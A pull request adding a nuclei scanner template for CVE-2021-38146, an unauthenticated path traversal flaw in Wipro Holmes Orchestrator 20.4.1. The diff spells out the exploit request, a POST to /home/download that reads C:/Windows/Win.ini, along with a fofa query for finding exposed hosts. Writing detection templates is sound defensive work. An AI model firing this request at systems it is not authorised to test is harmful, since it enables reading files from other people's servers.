### PR TITLE
add CVE-2021-38146

### DIFF
--- a/http/cves/2021/CVE-2021-38146.yaml
+++ b/http/cves/2021/CVE-2021-38146.yaml
@@ -8,10 +8,10 @@ info:
     The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.
   remediation: Fixed In v21.4.0
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-38146
     - https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html
     - https://flippingbitz.com/post/wipro-ho-2041-cve/
     - https://www.wipro.com/holmes/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-38146
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -25,7 +25,7 @@ info:
     vendor: wipro
     product: holmes
     fofa-query: title="Wipro Holmes Orchestrator"
-  tags: cve,cve2021,packetstorm,wipro,lfi
+  tags: cve,cve2021,wipro,holmes,lfi
 
 http:
   - method: POST

--- a/http/cves/2021/CVE-2021-38146.yaml
+++ b/http/cves/2021/CVE-2021-38146.yaml
@@ -21,9 +21,11 @@ info:
     epss-percentile: 0.87875
     cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
   metadata:
+    max-request: 1
     vendor: wipro
     product: holmes
-  tags: cve,cve2021,packetstorm,Wipro,Wipro Holmes Orchestrator,lfi
+    fofa-query: title="Wipro Holmes Orchestrator"
+  tags: cve,cve2021,packetstorm,wipro,lfi
 
 http:
   - method: POST
@@ -47,6 +49,7 @@ http:
           - "[extensions]"
           - "[files]"
         condition: and
+
       - type: status
         status:
           - 200

--- a/http/cves/2021/CVE-2021-38146.yaml
+++ b/http/cves/2021/CVE-2021-38146.yaml
@@ -1,0 +1,52 @@
+id: CVE-2021-38146
+
+info:
+  name: Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download
+  author: securityforeveryone
+  severity: high
+  description: |
+    The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.
+  remediation: Fixed In v21.4.0
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-38146
+    - https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html
+    - https://flippingbitz.com/post/wipro-ho-2041-cve/
+    - https://www.wipro.com/holmes/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-38146
+    cwe-id: CWE-22
+    epss-score: 0.01735
+    epss-percentile: 0.87875
+    cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
+  metadata:
+    vendor: wipro
+    product: holmes
+  tags: cve,cve2021,packetstorm,Wipro,Wipro Holmes Orchestrator,lfi
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/home/download"
+
+    headers:
+      Content-Type: application/json
+
+    body: |
+      {
+        "SearchString": "C:/Windows/Win.ini",
+        "Msg": ""
+      }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "[fonts]"
+          - "[extensions]"
+          - "[files]"
+        condition: and
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
CVE-2021-38146 Arbitrary File Download
The Wipro Holmes Orchestrator provides an API endpoint to download various files through the applications such as log files. This functionality is visible only to the logged in users. However, the API itself does not have any authentication required to be called. This means that any unauthenticated users can issue requests to the API and download files which should be available to the authenticated users.

poc image for flippingbitz.com
![image](https://github.com/projectdiscovery/nuclei-templates/assets/90972683/5d358d3e-ab2d-4722-a656-6d40be55c58d)

poc sites
- https://flippingbitz.com/post/wipro-ho-2041-cve/#screenshots-2
- https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)